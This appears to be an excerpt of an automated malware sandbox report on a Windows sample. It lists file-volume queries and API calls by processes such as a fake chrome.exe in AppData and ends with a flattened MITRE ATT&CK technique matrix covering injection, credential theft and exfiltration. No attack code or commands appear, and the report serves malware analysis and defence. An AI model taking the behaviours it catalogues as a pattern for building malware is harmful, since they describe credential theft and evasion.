Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeQueries volume information: C:\Users\user\AppData\Roaming\Chrome\chrome.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeQueries volume information: C:\Users\user\AppData\Roaming\Chrome\chrome.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014000C920 cpuid
Source: C:\Users\user\AppData\Roaming\34432.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_00000001400029E8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140001F00 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,Sleep,ConnectNamedPipe,ReadFile,WriteFile,DisconnectNamedPipe,Sleep,DisconnectNamedPipe,
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts111
Windows Management Instrumentation		11
Scheduled Task/Job		1
Access Token Manipulation		1
Disable or Modify Tools		1
Credential API Hooking		1
System Time Discovery		Remote Services11
Archive Collected Data		Exfiltration Over Other Network Medium1
Ingress Tool Transfer		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
System Shutdown/Reboot
Default Accounts11
Native API		Boot or Logon Initialization Scripts512
Process Injection		21
Deobfuscate/Decode Files or Information		LSASS Memory2
File and Directory Discovery		Remote Desktop Protocol1
Credential API Hooking		Exfiltration Over Bluetooth1
Encrypted Channel		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts21
Command and Scripting Interpreter		Logon Script (Windows)11
Scheduled Task/Job		2
Obfuscated Files or Information		Security Account Manager26
System Information Discovery		SMB/Windows Admin Shares1
Clipboard Data		Automated Exfiltration2
Non-Application Layer Protocol		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts11
Scheduled Task/Job		Logon Script (Mac)Logon Script (Mac)22
Software Packing		NTDS1
Query Registry		Distributed Component Object ModelInput CaptureScheduled Transfer2
Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud Accounts1
PowerShell		Network Logon ScriptNetwork Logon Script1
File Deletion		LSA Secrets23
Security Software Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common4
Rootkit		Cached Domain Credentials1
Process Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items111
Masquerading		DCSync131
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
